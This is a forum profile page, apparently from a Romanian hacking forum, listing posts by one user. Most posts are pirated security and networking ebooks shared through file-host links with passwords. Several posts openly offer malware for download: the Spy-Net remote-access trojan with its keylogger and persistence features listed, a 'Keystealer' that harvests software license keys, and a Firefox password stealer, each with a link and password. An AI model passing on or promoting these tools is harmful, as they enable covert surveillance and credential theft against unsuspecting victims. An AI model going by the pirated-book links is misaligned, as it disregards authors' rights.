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Everything posted by Nytro

  1. Asa as avea eu o propunere. Cateva intrebari: 1) Cati ani ai? 2) De ce vrei sa iti faci cont aici? 3) Ce e ala un mouse? Si asa mai departe... Iar cineva valideaza conturile. Dar nu cred ca e cazul, eu nu am prea mai vazut obsedati de CQ si de parole de mess sau alte prostii. Edit: Sunt multi leecheri, care nu fac nimic, nu posteaza nimic. Cel mai bine, sa primeasca ban cei care au sub 10 posturi. Pentru ca nu are rost sa fie sterse conturile. Si daca ar mai fi si acea optiune de validare dupa cateva intrebari ar fi perfect...
  2. XP va ramane la putere, in defavoarea Windows 7 de Bianca Dinu | 15 aprilie 2009 Windows 7 se vrea a fi marea salvare a gigantului Microsoft, in conditiile in care ultimul sistem de operare lansat pana acum, Windows Vista, nu a fost nici pe departe cel mai mare succes. Totusi, potrivit unui studiu realizat de firma de cercetare Dimensional Research, se pare ca nici mult promovatul Windows 7 nu va fi folosit la scara larga, cel putin pana nu se dovedeste practic pentru nevoile utilizatorilor. Astfel, cele mai multe companii au declarat ca sunt si vor ramane precaute, preferand sa ramana fidele sistemului de operare Windows XP in loc sa riste achizitionarea si folosirea unui produs pe care nu il cunosc. Potrivit studiului, 83% dintre persoanele si companiile chestionate au declarat ca vor astepta cel putin 12 luni pana sa incerce Windows 7. Desi Windows XP trece oficial in suport limitat, la aproape opt ani dupa lansare, utilizatorii (fie ei companii sau individuali) se bazeaza pe el mai mult ca pe orice alta aplicatie. Sondajul a fost realizat in luna martie a acestui an, la el participand peste 1000 de profesionisti din IT si utilizatori ai sistemelor de operare Windows XP si Windows Vista.
  3. Cei interesati de subiect: http://hackpedia.info/viewforum.php?f=152
  4. Ma bag si eu. Lucrez la challenge-uri...
  5. 1 - Some new functions -Send keylogger logs by email -Run server in a visible mode -Upload the plugin automatically during a new connection -Ability to update the server and send plugin by URL -Ability to make changes in configurations of installation of the server without the need to update -Encrypted connection (in this first version the crypt function is simple and can be modified in future versions) -Functions of MSN. This function is under test and does not work on some versions of messenger -Option to perform download directory -Ping function -New startup method: Run Explorer (HKLM and HKCU) -Open file with parameters in the file manager 2 - Some corrections made: -The connection with client was modified to avoid the loss from the server after a disconnection. -Correction of boot methods -Correction in filesearch function that caused crash of the server in some cases -Correction in the keylogger, which the user tried to perform the download of logs occurred, in some cases, the crash of the server -Fixed other small bugs that do not affect the execution of the program. Download: http://www.netdrive.ws/165943.html Password: Spy-Net
  6. Download: http://www.netdrive.ws/165942.html
  7. Splinter Cell Pandora Tomorrow DVD Audio Extractor (Name) Splinter Cell Chaos Theory Call of Duty Call of Duty United Offensive Call of Duty 2 Call of Duty 4 Call of Duty WAW Dawn of War Dawn of War - Dark Crusade Dawn of War - Dark Crusade Dawn of War - Dark Crusade Medieval II Total War Adobe Goolive Nero 7 ACDSystems PicAView Act of War Adobe Photoshop 7 Advanced PDF Password Recovery Advanced PDF Password Recovery Pro Advanced ZIP Password Recovery Anno 1701 Ashamopp WinOptimizer Platinum AV Voice Changer Battlefield(1942) Battlefield 1942 Secret Weapons of WWII Battlefield 1942 The Road to Rome Battlefield 2 Battlefield(2142) Battlefield Vietnam Black and White Black and White 2 Boulder Dash Rocks Burnout Paradise Camtasia Studio 4(Name) Camtasia Studio 4(Key) Chrome Codec Tweak Tool Command and Conquer Generals Command and Conquer Generals Zero Hour Red Alert 2 Red Alert Command and Conquer Tiberian Sun Command and Conquer 3 Command and Conquer 3 Company of Heroes Company of Heroes Counter-Strike Crysis PowerDVD PowerBar CyberLink PowerProducer Day of Defeat The Battle for Middle-earth II The Sims 2 The Sims 2 University The Sims 2 Nightlife The Sims 2 Open For Business The Sims 2 Pets The Sims 2 Seasons The Sims 2 Glamour Life Stuff The Sims 2 Celebration Stuff The Sims 2 H M Fashion Stuff The Sims 2 Family Fun Stuff DVD Audio Extractor (Serial) Empire Earth II F.E.A.R F-Secure FARCRY FIFA 2002 FIFA 2003 FIFA 2004 FIFA 2005 FIFA 07 FIFA 08 Freedom Force Frontlines: Fuel of War Beta Frontlines: Fuel of War GetRight Global Operations Gunman Half-Life Hllgate: London Hidden & Dangerous 2 IGI 2 Retail InCD Serial InCD Username IG2 iPod Converter (Registration Code) iPod Converter (User Name) James Bond 007 Nightfire Status Legends of Might and Magic Macromedia Flash 7 Macromedia Fireworks 7 Macromedia Dreamweaver 7 Madden NFL 07 Matrix Screensave Medal of Honor: Airborne Medal of Honor: Allied Assault Medal of Honor: Allied Assault: Breakthrough Medal of Honor: Allied Assault: Spearhead Medal of Honor: Heroes 2 mIRC Nascar Racing 2002 Nascar Racing 2003 NHL 2002 NBA LIVE 2003 NBA LIVE 2004 NBA LIVE 07 NBA Live 08 Need for Speed Carbon Need For Speed Hot Pursuit 2 Need for Speed Most Wanted Need for Speed ProStreet Need For Speed Underground Need for Speed Underground 2 Nero - Burning Rom Nero 7 Nero 8 NHL 2002 NHL 2004 NHL 2005 NOX Numega SmartCheck OnlineTVPlayer (Name) OnlineTVPlayer (Serial) O&O Defrag 8.0 (Username) O&O Defrag 8.0 (Company) O&O Defrag 8.0 (Serial) Partition Magic 8.0 Passware Encryption Analyzer (Name) Passware Encryption Analyzer (License) Passware Encryption Analyzer (Serial) Passware Windows Key (License) Passware Windows Key (Name) Passware Windows Key (Serial) PowerDvD PowerStrip Pro Evolution Soccer 2008 Rainbow Six III RavenShield Shogun Total War Warlord Edition Sid(Meier) 's Pirates! Sid(Meier) 's Pirates! Sim City 4 Deluxe Sim City 4 Sniffer Pro 4.5 Soldiers Of Anarchy Soldiers Of Anarchy Stalker - Shadow of Chernobyl Star Wars Battlefront II (v1.0) Star Wars Battlefront II (v1.1) Steganos Internet Anonym VPN Splinter Cell Pandora Tomorrow Surpreme Commander S.W.A.T 2 S.W.A.T 3 S.W.A.T 4 TechSmith SnagIt (Name) TechSmith SnagIt (Name) TechSmith SnagIt (Serial) Texas Calculatem 4 (Owner) Texas Calculatem 4 (Owner) The Battle for Middle-earth The Orange Box The Orange Box TMPGEnc DVD Author TuneUp 2007 (Name) TuneUp 2007 (Key) TuneUp 2007 (Company) TuneUp 2008 (Name) TuneUp 2008 (Key) TuneUp 2008 (Company) TuneUp 2009 (Name) TuneUp 2009 (Key) TuneUp 2009 (Company) Winamp (Username) Winamp (Serial) You need "Net Framework 2.0" Anubis scan: http://anubis.iseclab.org/?action=result&task_id=1ea9b04ed829168b4158c4294a783db94&format=html Download: http://rapidshare.com/files/220157251/Keystealer.rar
  8. Simple FF 3 Stealer use Nirsoft tools Download: http://www.netdrive.ws/165941.html
  9. In this age of viruses and hackers, of electronic eavesdropping and electronic fraud, security is paramount. As the disciplines of cryptography and network security have matured, more practical, readily available applications to enforce network security have developed. This text provides a practical survey of both the principles and practice of cryptography and network security. First, the basic issues to be addressed by a network security capability are explored through a tutorial and survey of cryptography and network security technology. Then, the practice of network security is explored via practical applications that have been implemented and are in use today. Download (11.4Mb): http://rapidshare.com/files/17833529/Cryptography_And_Network_Security.rar Mirror: http://www.filefactory.com/file/4f04a1/ Password: www.ebooksdb.com
  10. The Linux operating system continues to gain market share based largely on its reputation as being the most secure operating system available. The challenge faced by system administrators installing Linux is that it is secure only if installed and configured properly, constantly and meticulously updated, and carefully integrated with a wide variety of Open Source security tools. The fact that Linux source code is readily available to every hacker means that system administrators must continually learn security and anti-hacker techniques. Hack Proofing Linux will provide system administrators with all of the techniques necessary to properly configure and maintain Linux systems and counter malicious attacks. * Linux operating systems and Open Source security tools are incredibly powerful, complex, and notoriously under-documented - this book addresses a real need * CD-Rom contains Red Hat/Mandrake Linux RPMs as well as tarballs for other Linux distributions and the BSD community * Uses forensics-based analysis to give the reader an insight to the mind of a hacker. Download (10.3Mb): http://rapidshare.com/files/18715588/Hack_Proofing_Linux_-_A_Guide_To_Open_Source_Security.rar Mirror: http://www.filefactory.com/file/16d8da/ Password: www.ebooksdb.com
  11. This little black book discover all knowledge you required to become a virus coder and also to be virus decoder. Ahh...! I think you all already know what is it.. right...? then i just want to tell you that (i mean the definition of computer virus) it is... A computer virus is a computer program that can copy itself and infect a computer without permission or knowledge of the user. A computer virus is a computer program that can copy itself and infect a computer without permission or knowledge of the user. The original may modify the copies or the copies may modify themselves, as occurs in a metamorphic virus. A virus can only spread from one computer to another when its host is taken to the uninfected computer, for instance by a user sending it over a network or carrying it on a removable medium such as a floppy disk, CD, or USB drive. Additionally, viruses can spread to other computers by infecting files on a network file system or a file system that is accessed by another computer. Viruses are sometimes confused with computer worms and Trojan horses. A worm, however, can spread itself to other computers without needing to be transferred as part of a host. A Trojan horse is a form of malware that presents itself as a legitimate program. In contrast to viruses, Trojan horses do not insert their code into other computer files. Many personal computers are now connected to the Internet and to local-area networks, facilitating their spread. Today's viruses may also take advantage of network services such as the World Wide Web, e-mail, and file sharing systems to spread, blurring the line between viruses and worms. Furthermore, some sources use an alternative terminology in which a virus is any form of self-replicating malware. The term comes from the term virus in biology. A computer virus reproduces by making, possibly modified, copies of itself in the computer's memory, storage, or over a network. This is similar to the way a biological virus works. Some viruses are programmed to damage the computer by damaging programs, deleting files, or reformatting the hard disk. Others are not designed to do any damage, but simply replicate themselves and perhaps make their presence known by presenting text, video, or audio, messages. Even these benign viruses can create problems for the computer user. They typically take up computer memory used by legitimate programs. As a result, they often cause erratic behavior and can result in system crashes. In addition, many viruses are bug-ridden, and these bugs may lead to system crashes and data loss. There are many viruses operating in the general Internet today, and new ones are discovered every day. GOTO www.agloco.com for BIG MONEY USING THIS REFFERAL's ID : BBBY6996 ....okey, Download: http://rapidshare.com/files/20500009/The_little_black_book_of_computer_virus.rar Password: www.softarchive.net
  12. The Secure Sockets Layer (SSL) and Transport Layer Security(TLS) protocols form the foundation for e-commerce security on the World Wide Web, verifying the authenticity of Web sites, encrypting the transfer of sensitive data, and ensuring the integrity of information exchanged. Now-for the first time the details of these critical security protocols are available in a complete, clear, and concise reference. SSL and TLS Essentials provides complete documentation of the SSL and TLS protocols, including advanced and proprietary extensions never before published. The book thoroughly covers the protocols in operation, including the contents of their messages, message formats, and the cryptographic calculations used to construct them. The text also includes an introduction to cryptography and an explanation of X.509 public key certificates. Stephen Thomas, author of IPng and the TCP/IP Protocols, presents this complex material in a clear and reader-friendly manner. The book includes more than 80 figures and illustrations to supplement its text, and it describes SSL in the context of real-world, practical applications. Download (1Mb): http://rapidshare.com/files/22733925/SSL_and_TLS_Essentials_-_Securing_the_Web.rar Mirror: http://www.filefactory.com/file/0c4f79/ Password: www.ebooksdb.com
  13. Did you know that a typical unprotected PC is attacked within 20 minutes of being connected to the Internet? Protect yourself and your family with the CA Internet Security * Recognize the enemy—viruses, worms, Trojan horses, and zombies * Find the lurking applications on your system—spyware and adware * Stop spammers from using your computer to send bulk emails by the millions * Surf sensibly with the right Web browser * Block hackers with the robust CA personal firewall * Update your PC protection regularlyCA Founded in 1976, CA is a global company with 150 offices in more than 45 countries and revenues of $3.5 billion in 2005. With over 15,000 employees, CA provides products and support to 980f Fortune 500® companies, as well as government entities, educational institutions, and thousands of other companies in diverse industries worldwide. CA products cover systems, networks, security, storage, and databases. Download (5.4Mb): http://rapidshare.com/files/22894917/Wiley.Simple.Computer.Security.Disinfect.Your.PC.Jan.2007.eBook-BBL.rar Mirror: http://www.filefactory.com/file/29c942/ Password: www.ebooksdb.com
  14. In the fast-moving world of computers, things are always changing. Since the first edition of this strong-selling book appeared two years ago, network security techniques and tools have evolved rapidly to meet new and more sophisticated threats that pop up with alarming regularity. The second edition offers both new and thoroughly updated hacks for Linux, Windows, OpenBSD, and Mac OS X servers that not only enable readers to secure TCP/IP-based services, but helps them implement a good deal of clever host-based security techniques as well. This second edition of Network Security Hacks offers 100 concise and practical hacks, including more information for Windows administrators, hacks for wireless networking (such as setting up a captive portal and securing against rogue hotspots), and techniques to ensure privacy and anonymity, including ways to evade network traffic analysis, encrypt email and files, and protect against phishing attacks. System administrators looking for reliable answers will also find concise examples of applied encryption, intrusion detection, logging, trending and incident response. In fact, this “roll up your sleeves and get busy” security book features updated tips, tricks & techniques across the board to ensure that it provides the most current information for all of the major server software packages. These hacks are quick, clever, and devilishly effective. Download (4Mb): http://rapidshare.com/files/25811510/OReilly.Network.Security.Hacks.2nd.Edition.Oct.2006.rar Mirror: http://www.megaupload.com/?d=J8YD9EET Password: www.ebooksdb.com
  15. The effective management of risks online is likely to be the greatest business enabler / destroyer of the next decade. Clearly, organizations that do not move to full e-commerce functionality are unlikely to flourish; whereas those that ignore cyber crime and the "dark side" of the Internet are likely to get badly burnt. This important new book highlights the key issues in online risk management, taking the premise that information security is no longer an issue confined to the IT department but is critical to all operational functions: finance, HR, marketing, production etc. Nor are its solutions purely technical. With two thirds of security breaches said to be caused by human error, management controls and processes are equally important. Download (0.6Mb): http://rapidshare.com/files/28872285/The_Secure_Online_Business_E.Commerce_It_Functionality_and_Business_Continuity.rar Mirror: http://www.megaupload.com/?d=YWFCOMCY Password: www.ebooksdb.com
  16. A good defense starts with a thorough understanding of your opponent’s offense. Hackers Beware teaches you how hackers think, what tools they use, and the techniques they utilize to compromise a machine. Eric Cole, a leading expert in information security, shows you not only how to detect these attacks, but what you can do to protect yourself against them. When it comes to securing your site, knowledge is power. This book gives you the knowledge to build a proper defense against attackers. With so much going on in regard to network security (or the lack thereof), a book on this topic almost needs no introduction. Less than 10 years ago, most people didn’t even know what the Internet or email was. To take a further step back, most people did not even have computers at work or home, and some even questioned their usefulness. Things have really changed. As I am writing this, the Carousel of Progress ride at Disney World goes through my mind. Things that we considered science fiction a decade ago are not only a reality, but an engrained part of our life. Heck, if the dedicated line at my house goes down for more than 30 minutes, my wife is screaming at me to fix it. This is truly the age of computers. TABLE OF CONTENT: chapter 01. Introduction chapter 02. How and Why Hackers Do It chapter 03. Information Gathering chapter 04. Spoofing chapter 05. Session Hijacking chapter 06. Denial of Service Attacks chapter 07. Buffer Overflow Attacks chapter 08. Password Security chapter 09. MS NT Password Crackers chapter 10. UNIX Password Crackers chapter 11. Fundamentals of MS NT chapter 12. Specific Exploits for NT chapter 13. Fundamentals of UNIX chapter 14. Specific Exploits for UNIX chapter 15. Preserving Access chapter 16. Covering the Tracks chapter 17. Other Types of Attacks chapter 18. SANS Top 10 chapter 19. Putting It All Together chapter 20. Summary Download (4.3Mb): http://rapidshare.com/files/37516097/hackbeware.rar Mirror: http://www.megaupload.com/?d=YJCO8JAM Password: www.ebooksdb.com
  17. An Introduction to Cryptography provides a solid mathematical treatment of cryptography for readers with little or no background in number theory. Although intended for undergraduate students, it contains enough optional, advanced material to challenge even the most informed reader and provides a solid basis for a second course on the subject. Throughout the book, the author incorporates nearly 300 problems, more than 80 examples, and over 60 diagrams, figures, and tables, as well as optional topics that go beyond the basics. An extensive index, appendices that review background material, and a list of symbols for easy reference complete this outstanding text. This edition presents the ideas behind cryptography and the applications of the subject. The first chapter provides a thorough treatment of the mathematics necessary to understand cryptography, including number theory and complexity, while the second chapter discusses cryptographic fundamentals, such as ciphers, linear feedback shift registers, modes of operation, and attacks. The next several chapters discuss DES, AES, public-key cryptography, primality testing, and various factoring methods, from classical to elliptical curves. The final chapters are comprised of issues pertaining to the Internet, such as pretty good privacy (PGP), protocol layers, firewalls, and cookies, as well as applications, including login and network security, viruses, smart cards, and biometrics. The book concludes with appendices on mathematical data, computer arithmetic, the Rijndael S-Box, knapsack ciphers, the Silver-Pohlig-Hellman algorithm, the SHA-1 algorithm, radix-64 encoding, and quantum cryptography. TABLE OF CONTENT: Chapter 01 - Mathematical Basics Chapter 02 - Cryptographic Basics Chapter 03 - DES and AES Chapter 04 - Public-Key Cryptography Chapter 05 - Primality Testing Chapter 06 - Factoring Chapter 07 - Electronic Mail and Internet Security Chapter 08 - Leading-Edge Applications Appendix A - Fundamental Facts Appendix B - Computer Arithmetic Appendix C - The Rijndael S-Box Appendix D - Knapsack Ciphers Appendix E - Silver-Pohlig-Hellman Algorithm Appendix F - SHA-1 Appendix G - Radix-64 Encoding Appendix H - Quantum Cryptography Download (2.3Mb): http://rapidshare.com/files/75449954/anintrotocrypt2nd.rar Mirror: http://www.megaupload.com/?d=YYSMWY2M Password: www.ebooksdb.com
  18. With the arrival of IEEE 802.11b (a.k.a. WiFi) and other wireless networking technologies on the market comes a wave of stories about snoops intercepting sensitive LAN traffic from out in the company parking lot or across the concourse at the airport. Hack Proofing Your Wireless Network takes a look at strategies for defending wireless LANs–those based on Bluetooth and IEEE 802.11a as well as WiFi–against signal interception and other attacks peculiar to their wireless nature. Unfortunately, there's also a lot of background information on WiFi (as well as on security principles in general), and this is related to wireless network security only tangentially. Though this material represents unneeded padding, the bulk of the book is made up of useful information about security strategies and defensive configuration. There's also a fair bit of information about the security characteristics of some top-selling wireless networking products. In a section on choosing WiFi access points, the authors give a very explicit list of requirements (the ability to disable service-set identifier broadcasts, 128-bit Wired Equivalent Protocol–WEP–and so on), and list at least three real products (by make and model) that fit the specifications. They then proceed to show how to choose the most secure configuration options on each of the featured products, including the Cisco Systems Aironet and the Agere ORiNOCO. Configuration instructions are easy to follow and illustrated in detail. Information on the offensive side of the equation is shallower–the authors point out that it's possible to drive around, looking for unsecured wireless access points and that WEP has security flaws. Still, this book is one of the first on security for wireless networks, and it provides a lot of good information to the administrators of such networks Download (5.7Mb): http://rapidshare.com/files/20491988/Hac_Proof_Your_Wireless_Network.rar Mirror: http://www.filefactory.com/file/7f71bd/ Password: www.ebooksdb.com
  19. Start planning to transition to IPv6 internetworking and find out all about the next-generation Internet—from its features and benefits to its packet structure and protocol processes. This book is a straightforward discussion of the concepts, principles, and processes of Internet Protocol version 6 (IPv6) and how IPv6 is supported by the Microsoft Windows .NET Server 2003 family of operating systems. It is primarily a discussion of protocols and processes rather than a discussion of planning, configuration, deployment, and management. It is also mostly about IPv6 rather than the specifics of the implementation for the Windows .NET Server 2003 family. Therefore, this book does not contain in-depth implementation details of the IPv6 protocol for the Windows .NET Server 2003 family, such as structures, tables, buffers, or coding logic. These details are highly guarded Microsoft intellectual property that is of interest only to a relative handful of software developers. The purpose of this book is to provide an educational vehicle that will enable one to learn IPv6 to a fair technical depth—the terms, the addresses, the protocols, and the processes. This is not intended to be a breezy marketing overview of IPv6 and how it "provides integrated and interoperable technologies to enable exciting new scenarios for personal and enterprise computing." I will leave that type of documentation to those who are much better at it than I am. The bottom line is that I am a protocols and processes person. My main concern and interest is how the protocols work and what one sees on the wire (what packets are exchanged), and these topics comprise the bulk of this book. Download (1.1Mb): http://rapidshare.com/files/25116985/Understanding_IPv6.rar Mirror: http://www.megaupload.com/?d=JQP6WHFG Password: www.ebooksdb.com
  20. Tomorrow, all communications will happen over IP. In the past, telecom operators handled most communications, and the main business for them was voice communication. In reality, almost all last-mile communications today still happen over the conventional telecom infrastructure. The backbone of the Internet has been going through a fast transition to faster and faster fiber optics and digital data transfer. The era of analog communications has been over for some time already. Today, people speak of Voice over IP, but a better name for the Next Generation Networks is Everything over IP (EoIP). And all of that communication will be wireless. But what does that have to do with the topic of this book? It means the world has to finally wake up to the security of the communications networks. To be secure, you have to understand that wireless networks are always open. While in traditional telephone networks all the switches were kept behind locked doors and all the cabling was protected, in wireless technology there are no cables and everyone has access to wireless access points. One compromised infrastructure component, and the entire network is compromised. One virus-contaminated access device, and everyone in the network will be contaminated. This book is built around voice as the application to be secured, but the principles apply to any communications. Studying this book should be obligatory to all students in computer engineering and computer science, not only due to its content and deep understanding of VoIP security, but also to allow them to learn how to apply the best practices in other fields, no matter what their future field of study will be. The key to learning is not only studying things and memorizing the various topics, but learning how to apply the best practices of other fields in your own. Combining the best practices of traditional telecommunications, e-mail, and the web into new next-generation technologies is essential to be able to build reliable and usable communication technologies. Voice over IP is potentially the killer application, destroying conventional communication networks and creating a new IP-based communication infrastructure. TABLE OF CONTENT: Chapter 01 - Introduction Chapter 02 - VoIP Architectures and Protocols Chapter 03 - Threats and Attacks Chapter 04 - VoIP Vulnerabilities Chapter 05 - Signaling Protection Mechanisms Chapter 06 - Media Protection Mechanisms Chapter 07 - Key Management Mechanisms Chapter 08 - VoIP and Network Security Controls Chapter 09 - A Security Framework for Enterprise VoIP Networks Chapter 10 - Provider Architectures and Security Chapter 11 - Enterprise Architectures and Security Download (4,9Mb): http://rapidshare.com/files/77713998/secvoipnet.rar Mirror: http://www.megaupload.com/?d=Q1DEEN3X Password: www.ebooksdb.com
  21. Your Guide to Easy and Secure Windows Vista Networking is a complete beginner’s guide to creating, configuring, administering, and using a small network using Windows Vista computers. Inside you’ll find comprehensive coverage of networking hardware, including Ethernet (wired) hardware (from NICs to cables to switches to routers) and wireless Hardware–from wireless NICs to access points to range extenders. We include handy ”buyer’s guides” that tell you how to make smart choices when purchasing network hardware. With hardware in hand, we then show you how to roll up your shirtsleeves and put everything together, including configuring a router, laying cable, and connecting the devices. Next, we then show you how to wrangle with Windows Vista’s networking features. These techniques include using the Network and Sharing Center, managing wired and wireless connections, accessing shared network resources, sharing local resources on the network, and working with network files offline. And if you are a music and video aficionado, we’ve got you covered with a special chapter that shows you just how to set up a networked Vista PC as your digital media hub! No networking book would be complete without extensive coverage of security issues that affect anyone connected to the Internet. We show you how to secure each computer, secure your global networking settings, and batten down your wireless connections. The last part of the book includes intermediate networking tasks such as making remote connections, monitoring the network, troubleshooting network problems, and setting up Vista’s built-in web server and FTP server. Download (16Mb): http://rapidshare.com/files/93721866/Networking_with_Microsoft_Windows_Vista.rar Mirror: http://www.megaupload.com/?d=KZYHP2CM Password: www.ebooksdb.com
  22. A description and analysis of the vulnerabilities caused by programming errors in Web applications, this book is written from both from the attacker's and security specialist's perspective. Covered is detecting, investigating, exploiting, and eliminating vulnerabilities in Web applications as well as errors such as PHP source code injection, SQL injection, and XSS. The most common vulnerabilities in PHP and Perl scripts and methods of exploiting these weaknesses are described, information on writing intersite scripts and secure systems for the hosted sites, creating secure authorization systems, and bypassing authorization. Uncovered is how attackers can benefit from the hosted target and why an apparently normal-working application might be vulnerable. Download (0.6Mb): http://rapidshare.com/files/25279097/Hacker.Web.Exploitation.Uncovered.rar Mirror: http://www.megaupload.com/?d=LSA5VKLX Password: www.ebooksdb.com
  23. Today the vast majority of the world's information resides in, is derived from, and is exchanged among multiple automated systems. Critical decisions are made, and critical action is taken based on information from these systems. Therefore, the information must be accurate, correct, and timely, and be manipulated, stored, retrieved, and exchanged safely, reliably, and securely. In a time when information is considered the latest commodity, information security should be top priority. A Practical Guide to Security Engineering and Information Assurance gives you an engineering approach to information security and information assurance (IA). The book examines the impact of accidental and malicious intentional action and inaction on information security and IA. Innovative long-term vendor, technology, and application-independent strategies show you how to protect your critical systems and data from accidental and intentional action and inaction that could lead to system failure or compromise. The author presents step-by-step, in-depth processes for defining information security and assurance goals, performing vulnerability and threat analysis, implementing and verifying the effectiveness of threat control measures, and conducting accident and incident investigations. She explores real-world strategies applicable to all systems, from small systems supporting a home-based business to those of a multinational corporation, government agency, or critical infrastructure system. The information revolution has brought its share of risks. Exploring the synergy between security, safety, and reliability engineering, A Practical Guide to Security Engineering and Information Assurance consolidates andorganizes current thinking about information security/IA techniques, approaches, and best practices. As this book will show you, there is considerably more to information security/IA than firewalls, encryption, and virus protection. Download (3.8Mb): http://rapidshare.com/files/98438320/A_Practical_Guide_to_Security_Engineering_and_Information_Assurance_.rar Mirror: http://www.megaupload.com/?d=7DP49KQR Password: www.ebooksdb.com
  24. Contrary to popular belief, Ethernet switches are not inherently secure. Security vulnerabilities in Ethernet switches are multiple: from the switch implementation, to control plane protocols (Spanning Tree Protocol [sTP], Cisco® Discovery Protocol [CDP], and so on) and data plane protocols, such as Address Routing Protocol (ARP) or Dynamic Host Configuration Protocol (DHCP). LAN Switch Security explains all the vulnerabilities in a network infrastructure related to Ethernet switches. Further, this book shows you how to configure a switch to prevent or to mitigate attacks based on those vulnerabilities. This book also includes a section on how to use an Ethernet switch to increase the security of a network and prevent future attacks. Divided into four parts, LAN Switch Security provides you with steps you can take to ensure the integrity of both voice and data traffic traveling over Layer 2 devices. Part I covers vulnerabilities in Layer 2 protocols and how to configure switches to prevent attacks against those vulnerabilities. Part II addresses denial-of-service (DoS) attacks on an Ethernet switch and shows how those attacks can be mitigated. Part III shows how a switch can actually augment the security of a network through the utilization of wirespeed access control list (ACL) processing and IEEE 802.1x for user authentication and authorization. Part IV examines future developments from the LinkSec working group at the IEEE. For all parts, most of the content is vendor independent and is useful for all network architects deploying Ethernet switches. After reading this book, you will have an in-depth understanding of LAN security and be prepared to plug the security holes that exist in a great number of campus networks. Eric Vyncke has a master’s degree in computer science engineering from the University of Liège in Belgium. Since 1997, Eric has worked as a Distinguished Consulting Engineer for Cisco, where he is a technical consultant for security covering Europe. His area of expertise for 20 years has been mainly security from Layer 2 to applications. He is also guest professor at Belgian universities for security seminars. Download (2.7Mb): http://rapidshare.com/files/71033484/Cisco_Press_LAN_Switch_Security.rar Mirror: http://www.megaupload.com/?d=QE84UN9U Password: www.ebooksdb.com
  25. Hacker Linux Uncovered - A-ListConcentrating on Linux installation, tuning, and administration, this guide to protecting systems from security attacks demonstrates how to install Linux so that it is tuned for the highest security and best performance, how to scan the network and encrypt the traffic for securing all private traffics in a public network, and how to monitor and log the system to detect potential security problems. Backup and recovery policies that provide a structure for secure operations are also considered, and information related to configuring an Apache server, e-mail service, and the Internet gateway using a proxy server, an FTP server, DSN server for mapping DNS names to IP addresses, and firewall for system protection is provided.Download (4.6Mb): Download: http://rapidshare.com/files/166600840/www.linkra.com_hackerlinuxuncovered_-_a.list.rar.html http://w18.easy-share.com/1702532147.html http://www.filefactory.com/file/adaa2b/n/www_linkra_com_hackerlinuxuncovered_-_a_list_rar Pass: www.ebooksdb.com
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